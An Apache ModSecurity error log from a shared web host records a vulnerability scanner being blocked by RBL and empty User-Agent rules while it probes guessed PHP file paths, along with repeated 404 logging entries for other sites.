[Tue May 26 12:54:39.655950 2026] [security2:error] [pid 461618:tid 461840] [client 20.9.81.163:31425] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/file3.php"] [unique_id "ahVKt1yiSlSCHr1fdr21bwAAAOE"]
[Tue May 26 12:54:39.795667 2026] [security2:error] [pid 461618:tid 461787] [client 20.9.81.163:9636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-mail.php"] [unique_id "ahVKt1yiSlSCHr1fdr21eQAAAKw"]
[Tue May 26 12:54:39.795776 2026] [security2:error] [pid 461618:tid 461787] [client 20.9.81.163:9636] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-mail.php"] [unique_id "ahVKt1yiSlSCHr1fdr21eQAAAKw"]
[Tue May 26 12:54:39.981771 2026] [security2:error] [pid 461618:tid 461856] [client 20.9.81.163:9606] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/about.php"] [unique_id "ahVKt1yiSlSCHr1fdr21fQAAAPE"]
[Tue May 26 12:54:39.981917 2026] [security2:error] [pid 461618:tid 461856] [client 20.9.81.163:9606] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/about.php"] [unique_id "ahVKt1yiSlSCHr1fdr21fQAAAPE"]
[Tue May 26 12:54:40.203369 2026] [security2:error] [pid 461618:tid 461788] [client 20.9.81.163:29876] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp.php"] [unique_id "ahVKuFyiSlSCHr1fdr21hAAAAK0"]
[Tue May 26 12:54:40.203464 2026] [security2:error] [pid 461618:tid 461788] [client 20.9.81.163:29876] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp.php"] [unique_id "ahVKuFyiSlSCHr1fdr21hAAAAK0"]
[Tue May 26 12:54:40.346553 2026] [security2:error] [pid 461618:tid 461822] [client 20.9.81.163:10290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/.dj/index.php"] [unique_id "ahVKuFyiSlSCHr1fdr21igAAAM8"]
[Tue May 26 12:54:40.346694 2026] [security2:error] [pid 461618:tid 461822] [client 20.9.81.163:10290] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/.dj/index.php"] [unique_id "ahVKuFyiSlSCHr1fdr21igAAAM8"]
[Tue May 26 12:54:40.494705 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:37991] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/adminfuns.php"] [unique_id "ahVKuFyiSlSCHr1fdr21jwAAAJk"]
[Tue May 26 12:54:40.494826 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:37991] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/adminfuns.php"] [unique_id "ahVKuFyiSlSCHr1fdr21jwAAAJk"]
[Tue May 26 12:54:40.628550 2026] [security2:error] [pid 461618:tid 461755] [client 20.9.81.163:52087] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/php8.php"] [unique_id "ahVKuFyiSlSCHr1fdr21lAAAAIw"]
[Tue May 26 12:54:40.628652 2026] [security2:error] [pid 461618:tid 461755] [client 20.9.81.163:52087] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/php8.php"] [unique_id "ahVKuFyiSlSCHr1fdr21lAAAAIw"]
[Tue May 26 12:54:40.767750 2026] [security2:error] [pid 461618:tid 461866] [client 20.9.81.163:29857] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/classwithtostring.php"] [unique_id "ahVKuFyiSlSCHr1fdr21lQAAAPs"]
[Tue May 26 12:54:40.767879 2026] [security2:error] [pid 461618:tid 461866] [client 20.9.81.163:29857] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/classwithtostring.php"] [unique_id "ahVKuFyiSlSCHr1fdr21lQAAAPs"]
[Tue May 26 12:54:40.894229 2026] [security2:error] [pid 461618:tid 461782] [client 20.9.81.163:32761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/info.php"] [unique_id "ahVKuFyiSlSCHr1fdr21nwAAAKc"]
[Tue May 26 12:54:40.894329 2026] [security2:error] [pid 461618:tid 461782] [client 20.9.81.163:32761] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/info.php"] [unique_id "ahVKuFyiSlSCHr1fdr21nwAAAKc"]
[Tue May 26 12:54:41.038594 2026] [security2:error] [pid 461618:tid 461833] [client 20.9.81.163:29833] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/ioxi-o.php"] [unique_id "ahVKuVyiSlSCHr1fdr21pQAAANo"]
[Tue May 26 12:54:41.038736 2026] [security2:error] [pid 461618:tid 461833] [client 20.9.81.163:29833] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/ioxi-o.php"] [unique_id "ahVKuVyiSlSCHr1fdr21pQAAANo"]
[Tue May 26 12:54:41.171272 2026] [security2:error] [pid 461618:tid 461856] [client 20.9.81.163:34008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/011i.php"] [unique_id "ahVKuVyiSlSCHr1fdr21rQAAAPE"]
[Tue May 26 12:54:41.171369 2026] [security2:error] [pid 461618:tid 461856] [client 20.9.81.163:34008] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/011i.php"] [unique_id "ahVKuVyiSlSCHr1fdr21rQAAAPE"]
[Tue May 26 12:54:41.306900 2026] [security2:error] [pid 461618:tid 461758] [client 20.9.81.163:30065] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/edit.php"] [unique_id "ahVKuVyiSlSCHr1fdr21swAAAI8"]
[Tue May 26 12:54:41.306996 2026] [security2:error] [pid 461618:tid 461758] [client 20.9.81.163:30065] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/edit.php"] [unique_id "ahVKuVyiSlSCHr1fdr21swAAAI8"]
[Tue May 26 12:54:41.457653 2026] [security2:error] [pid 461618:tid 461825] [client 20.9.81.163:1277] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/sid3.php"] [unique_id "ahVKuVyiSlSCHr1fdr21uQAAANI"]
[Tue May 26 12:54:41.457792 2026] [security2:error] [pid 461618:tid 461825] [client 20.9.81.163:1277] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/sid3.php"] [unique_id "ahVKuVyiSlSCHr1fdr21uQAAANI"]
[Tue May 26 12:54:41.608722 2026] [security2:error] [pid 461618:tid 461769] [client 20.9.81.163:17391] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/load.php"] [unique_id "ahVKuVyiSlSCHr1fdr21vAAAAJo"]
[Tue May 26 12:54:41.608886 2026] [security2:error] [pid 461618:tid 461769] [client 20.9.81.163:17391] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/load.php"] [unique_id "ahVKuVyiSlSCHr1fdr21vAAAAJo"]
[Tue May 26 12:54:41.752501 2026] [security2:error] [pid 461618:tid 461804] [client 20.9.81.163:17352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/166.php"] [unique_id "ahVKuVyiSlSCHr1fdr21xAAAAL0"]
[Tue May 26 12:54:41.752611 2026] [security2:error] [pid 461618:tid 461804] [client 20.9.81.163:17352] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/166.php"] [unique_id "ahVKuVyiSlSCHr1fdr21xAAAAL0"]
[Tue May 26 12:54:41.875165 2026] [security2:error] [pid 461618:tid 461835] [client 20.9.81.163:40963] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/load.php"] [unique_id "ahVKuVyiSlSCHr1fdr21yAAAANw"]
[Tue May 26 12:54:41.875285 2026] [security2:error] [pid 461618:tid 461835] [client 20.9.81.163:40963] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/load.php"] [unique_id "ahVKuVyiSlSCHr1fdr21yAAAANw"]
[Tue May 26 12:54:41.991862 2026] [security2:error] [pid 461618:tid 461873] [client 20.9.81.163:37964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/166.php"] [unique_id "ahVKuVyiSlSCHr1fdr21zwAAAQI"]
[Tue May 26 12:54:41.991985 2026] [security2:error] [pid 461618:tid 461873] [client 20.9.81.163:37964] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/166.php"] [unique_id "ahVKuVyiSlSCHr1fdr21zwAAAQI"]
[Tue May 26 12:54:42.112320 2026] [security2:error] [pid 461618:tid 461854] [client 20.9.81.163:34015] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-mail.php"] [unique_id "ahVKulyiSlSCHr1fdr213QAAAO8"]
[Tue May 26 12:54:42.112428 2026] [security2:error] [pid 461618:tid 461854] [client 20.9.81.163:34015] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-mail.php"] [unique_id "ahVKulyiSlSCHr1fdr213QAAAO8"]
[Tue May 26 12:54:42.228144 2026] [security2:error] [pid 461618:tid 461784] [client 85.121.55.185:60510] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr212AAAAKk"]
[Tue May 26 12:54:42.228855 2026] [security2:error] [pid 461618:tid 461783] [client 85.121.55.185:60584] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr213gAAAKg"]
[Tue May 26 12:54:42.238948 2026] [security2:error] [pid 461618:tid 461839] [client 20.9.81.163:34026] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/leaf.php"] [unique_id "ahVKulyiSlSCHr1fdr22BgAAAOA"]
[Tue May 26 12:54:42.239075 2026] [security2:error] [pid 461618:tid 461839] [client 20.9.81.163:34026] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/leaf.php"] [unique_id "ahVKulyiSlSCHr1fdr22BgAAAOA"]
[Tue May 26 12:54:42.249426 2026] [security2:error] [pid 461618:tid 461780] [client 85.121.55.185:60508] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr212gAAAKU"]
[Tue May 26 12:54:42.253434 2026] [security2:error] [pid 461618:tid 461814] [client 85.121.55.185:60564] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr214AAAAMc"]
[Tue May 26 12:54:42.267767 2026] [security2:error] [pid 461618:tid 461820] [client 85.121.55.185:60542] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr211QAAAM0"]
[Tue May 26 12:54:42.275790 2026] [security2:error] [pid 461618:tid 461753] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr21-gAAAIo"]
[Tue May 26 12:54:42.286342 2026] [security2:error] [pid 461618:tid 461782] [client 85.121.55.185:60534] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr212QAAAKc"]
[Tue May 26 12:54:42.287699 2026] [security2:error] [pid 461618:tid 461775] [client 85.121.55.185:60506] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr217QAAAKA"]
[Tue May 26 12:54:42.295587 2026] [security2:error] [pid 461618:tid 461833] [client 85.121.55.185:60550] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr215gAAANo"]
[Tue May 26 12:54:42.297221 2026] [security2:error] [pid 461618:tid 461805] [client 85.121.55.185:60540] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr215AAAAL4"]
[Tue May 26 12:54:42.298502 2026] [security2:error] [pid 461618:tid 461865] [client 85.121.55.185:60528] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr211wAAAPo"]
[Tue May 26 12:54:42.315814 2026] [security2:error] [pid 461618:tid 461830] [client 85.121.55.185:60516] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr210AAAANc"]
[Tue May 26 12:54:42.322342 2026] [security2:error] [pid 461618:tid 461771] [client 85.121.55.185:60560] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr210wAAAJw"]
[Tue May 26 12:54:42.331972 2026] [security2:error] [pid 461618:tid 461810] [client 85.121.55.185:60570] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr214wAAAMM"]
[Tue May 26 12:54:42.335672 2026] [security2:error] [pid 461618:tid 461860] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr22BAAAAPU"]
[Tue May 26 12:54:42.339216 2026] [security2:error] [pid 461618:tid 461848] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr21-wAAAOk"]
[Tue May 26 12:54:42.342087 2026] [security2:error] [pid 461618:tid 461842] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr21_AAAAOM"]
[Tue May 26 12:54:42.346240 2026] [security2:error] [pid 461618:tid 461797] [client 85.121.55.185:60576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr216AAAALY"]
[Tue May 26 12:54:42.361106 2026] [security2:error] [pid 461618:tid 461764] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr21_wAAAJU"]
[Tue May 26 12:54:42.364439 2026] [security2:error] [pid 461618:tid 461748] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr21-QAAAIU"]
[Tue May 26 12:54:42.370265 2026] [security2:error] [pid 461618:tid 461856] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr21_QAAAPE"]
[Tue May 26 12:54:42.373175 2026] [security2:error] [pid 461618:tid 461752] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr22AQAAAIk"]
[Tue May 26 12:54:42.374397 2026] [security2:error] [pid 461618:tid 461821] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr22AAAAAM4"]
[Tue May 26 12:54:42.376031 2026] [security2:error] [pid 461618:tid 461776] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr22AgAAAKE"]
[Tue May 26 12:54:42.385054 2026] [security2:error] [pid 461618:tid 461834] [client 20.9.81.163:44725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/grsiuk.php"] [unique_id "ahVKulyiSlSCHr1fdr22CgAAANs"]
[Tue May 26 12:54:42.385178 2026] [security2:error] [pid 461618:tid 461834] [client 20.9.81.163:44725] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/grsiuk.php"] [unique_id "ahVKulyiSlSCHr1fdr22CgAAANs"]
[Tue May 26 12:54:42.387042 2026] [security2:error] [pid 461618:tid 461823] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr21_gAAANA"]
[Tue May 26 12:54:42.409365 2026] [security2:error] [pid 461618:tid 461875] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKuVyiSlSCHr1fdr21zgAAAQQ"]
[Tue May 26 12:54:42.409938 2026] [security2:error] [pid 461618:tid 461779] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKulyiSlSCHr1fdr22AwAAAKQ"]
[Tue May 26 12:54:42.521872 2026] [security2:error] [pid 461618:tid 461784] [client 20.9.81.163:37961] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/8.php"] [unique_id "ahVKulyiSlSCHr1fdr22EwAAAKk"]
[Tue May 26 12:54:42.521981 2026] [security2:error] [pid 461618:tid 461784] [client 20.9.81.163:37961] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/8.php"] [unique_id "ahVKulyiSlSCHr1fdr22EwAAAKk"]
